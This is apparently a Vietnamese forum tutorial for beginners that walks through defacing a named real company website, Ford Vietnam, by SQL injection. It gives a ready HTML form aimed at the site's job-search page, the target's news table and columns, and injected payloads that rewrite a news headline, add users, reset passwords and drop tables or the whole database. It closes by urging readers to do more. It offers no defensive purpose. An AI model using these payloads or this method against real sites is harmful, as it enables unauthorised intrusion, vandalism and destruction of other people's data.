FOR NEWBIE
Hihi em xin tiếp tục,bài này vẫn là cơ bản cho newbie,còn cao siêu hơn thì em chịu.Ởđây em xin mạn phép lấy thằng Ford ra làm victim.Mục đích của bài này là sử dụng các câu lệnh update,insert ,drop,delete... trong SQL để deFace.
Tạo 1 file có nội dung như sau: <body>
<form method="post"
action="https://www.ford.com.vn/Tuyendung/Jobs_Search_Action.asp" name="frmSearch" onsubmit="return CheckSubmit();">
TIM KIEM <input name="txtSearch" size="40" class="clsText" type="text" size=2> </br>
DIA DIEM <input type="text" name="SLocation" class="clsText" value="22"></br> JOB <input type="text" name="SJobCategory" class="clsText" value=""> </br> <input type=submit value="tim kiem"></br>
</form> </body>
Save as lại thành file xx.html,sau đó run như sau TIM KIEM: xxx
DIA DIEM: 22
JOB: 1' SQL command --
Trong database của nó có table Fordvn_news với các column
MessageId','Status','Priority','Subject','Lead',
'Img','Posted','Edited','Published','FromIp','Body','ReadCount'
Tương ứng với trang news của nó
https://www.ford.com.vn/News/News.asp
Ởđây em xin chọn cái subject để deface với messageid=146 Roài:
đây là các câu lệnh cần biết
Insert into user ("id","pas") values (1,"xxx")-- /*thêm 1 user xxx vào table user */ update user set pass="xxxx" where id=1-- /thay đổi pasword của thằng user có id=1 */ drop table user-- /*nguy hiểm,xóa table user */
drop database db-- /*rất nguy hiểm/
delete from user where id=1-- /*xóa column */ ...
Ởđây em dùng update QUOTE
TIM KIEM: xxx DIA DIEM: 22
JOB: 1' ;update fordvn_news set subject='TEST' where messageid=146--
Nếu bạn nhận dc 1 thông báo như thế này thay vì 1 thông báo lỗi SQL thì thành công rồi
đó
QUOTE
Không tìm được theo yêu cầu của bạn!
OK come on
https://www.ford.com.vn/News/News.asp
Bạn còn có thể làm dc nhiều thứ hơn tôi nữa,đây chỉ là VD thoai. Good luck !!!